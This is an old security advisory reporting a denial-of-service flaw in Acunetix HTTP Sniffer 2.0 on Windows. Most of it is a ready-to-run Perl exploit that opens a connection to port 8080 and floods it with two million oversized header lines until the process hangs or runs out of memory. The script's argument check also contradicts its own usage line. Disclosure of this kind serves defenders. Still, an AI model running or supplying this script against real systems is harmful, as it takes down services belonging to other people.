Update:
21:02 05/08/2005
Subject:
" Acunetix HTTP Sniffer Denial Of Service"
Vulnerable version:
Acunetix 2.0
Operating System:
- WINDOWS 95
- WINDOWS 98
- WINDOWS NT
- WINDOWS XP
Typical software:
commercial
Vendor URL:
Mail - support@Acunetix.com
WWW - www.Acunetix.com
Description:
Acunetix Web Vulnerability Scanner (WVS) tests the security of your website by crawling it and launching
popular attacks such as cross site scripting, sql injection and more. Identify vulnerabilities in shopping carts,
forms, secured areas and other web applications before hackers do! 75% of internet attacks are on web based
applications, because they frequently have access to confidential data and are positioned in front of the firewall.
Vulnerability:
A denial of service or buffer overflow condition occurs when a very
long text string or malicious code is sent to the service data application.
By sending a denial of service attacks into server application will made a process hanging
the CPU usage to 100% that could make application is not responding.
A terminate the application is required in order to terminate the hanging processes.
Exploit:
#!/usr/bin/perl
#
# Acunetix HTTP Sniffer DOS Exploit
# ------------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
# Vendor URL: www.acunetix.com
$ARGC=@ARGV;
if ($ARGC !=2) {
print "\n";
print " Acunetix HTTP Sniffer DOS Exploit\n";
print "-------------------------------------\n\n";
print "Usage: $0 [remote IP] \n";
print "Exam: $0 127.0.0.1\n";
exit;
}
use IO::Socket::INET;
$host=$ARGV[0];
$port= "8080";
print "\n";
print "[+] Connect to $host..\n";
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp')
|| die "[-] Connection error$@\n";
print "[+] Connected\n";
sleep(1);
print "[+] Build buffer..\n";
sleep(1);
$hostname="Host: $host";
$bufy='A'x50;
$bufa='A'x8183;
$len=length($bufy);
$buff="GET / HTTP/1.1\r\n";
sleep(1);
print "[+] Sending request..\n";
send($sock,$buff,0) || die "[-] send error:$@\n";
print "[+] Send DOS..";
for($i= 0; $i < 2000000; $i++)
{
$buff=" $bufa\r\n";
send($sock,$buff,0) || die "send error:$@\n[*] Check if server D0s'ed\n";
}
$buff="$hostname\r\n";
$buff.="Content-Length: $len\r\n";
$buff.="\r\n";
$buff.=$bufy."\r\n\r\n";
print "[+] Now kill the process..\n";
send($sock,$buff,0) || die "[-] send error:$@\n";
print "[+] DONE..Server Out of Memory\n";
close($sock);
Solution:
No fix at this moment.
Vendor has contacted for this vulnerability
Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com